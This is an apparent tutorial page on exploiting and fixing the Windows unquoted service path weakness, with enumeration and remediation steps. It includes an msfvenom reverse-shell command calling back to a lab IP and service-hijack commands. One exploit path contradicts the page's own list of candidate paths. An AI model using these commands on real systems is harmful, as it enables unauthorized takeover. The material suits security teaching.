HomeGitHubPortfolioTwitter/XMediumCont@ct

8 - Unquoted Service Path

Topics

  1. Introduction to the Windows Shells

  2. Windows Permissions

  3. Reverse Shells in Windows

  4. SeImpersonatePrivilege Exploitation

  5. On Cross Compilation

  6. Windows Services

  7. Weak Service Permissions

  8. Unquoted Service Path

  9. DLL Hijacking

  10. Always Install Elevated

  11. Files with Sensitive Data

  12. Windows Hashes

  13. Stored Credentials and the Windows Vault

  14. Scheduled Task

  15. Critical Registry Paths

  16. Useful Tools

  17. AMSI Bypass

Unquoted Service Path Vulnerability

The unquoted service path vulnerability arises when a Windows service binary's path contains spaces but lacks proper quotation marks. This leads the operating system to search for the service binary using a specific sequence of rules, potentially allowing an attacker to exploit the path traversal behavior.

When starting a service, Windows interprets its binary path as specified in the service configuration. If the path contains spaces and is unquoted, the system checks multiple potential executable paths in order, which can lead to unintended execution.

Example Service Configuration

SERVICE_NAME: SimpleService
    BINARY_PATH_NAME: C:\Users\Quickemu\Downloads\Example Directory\Another Directory\simpleService.exe

If the above path is unquoted, Windows will attempt to execute the following binaries in this order:

  1. C:\Users\Quickemu\Downloads\Example.exe

  2. C:\Users\Quickemu\Downloads\Example Directory\Another.exe

  3. C:\Users\Quickemu\Downloads\Example Directory\Another Directory\simpleService.exe

Attack Scenario

An attacker with write access to any of the intermediary directories can plant a malicious binary, such as Example.exe. When the service starts, Windows will execute the malicious binary instead of the intended service binary.

Exploiting Unquoted Service Paths

Exploit Steps

  1. Identify the Vulnerable Service View the service configuration:

    sc.exe qc SimpleService

  2. Create a Malicious Binary Generate a reverse shell binary:

    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.122.1 LPORT=7777 -f exe -o malicious.exe

  3. Place the Malicious Binary in a Targeted Path

    move malicious.exe "C:\Users\Quickemu\Downloads\Example Directory\Example.exe"

  4. Restart the Service

    sc.exe stop SimpleService
sc.exe start SimpleService

When the service restarts, Windows will execute Example.exe instead of simpleService.exe, effectively hijacking the service.

Additional Examples

Example 1

For the binary path:

C:\Program Files (x86)\Company\Company App\App.exe

The following binaries will be checked in order:

  1. C:\Program.exe

  2. C:\Program Files.exe

  3. C:\Program Files (x86)\Company\Company.exe

  4. C:\Program Files (x86)\Company\Company App\App.exe

Example 2

For the binary path:

C:\Program\Cool Company\Cool Binary.exe

The following binaries will be checked in order:

  1. C:\Program\Cool.exe

  2. C:\Program\Cool Company\Cool.exe

  3. C:\Program\Cool Company\Cool Binary.exe

Enumeration of Unquoted Service Paths

Using winPEAS

winPEAS can identify unquoted service paths.

.\winPEAS.exe quiet servicesinfo

Example Output

Look for the following indicators in the output:

SimpleService(SimpleService)[C:\Users\Quickemu\Downloads\Example Directory\Another\simpleService.exe]  
No quotes and Space detected  
File Permissions: Quickemu [AllAccess]  
Possible DLL Hijacking in binary folder: C:\Users\Quickemu\Downloads\Example Directory (Quickemu [AllAccess])

Fixing the Vulnerability

Fix Using RegEdit

  1. Open the Registry Editor (regedit.exe).

  2. Navigate to:

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SimpleService

  3. Locate the ImagePath key and add quotes around the binary path:

    "C:\Users\Quickemu\Downloads\Example Directory\Another Directory\simpleService.exe"

Fix Using sc.exe

Use the sc.exe command to update the service path with quotes:

sc.exe config SimpleService binpath="\"C:\Users\Quickemu\Downloads\Example Directory\Another Directory\simpleService.exe\""

Other Resources

Disclaimer

❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!

Previous7 - Weak Service PermissionsNext9 - DLL Hijacking

Last updated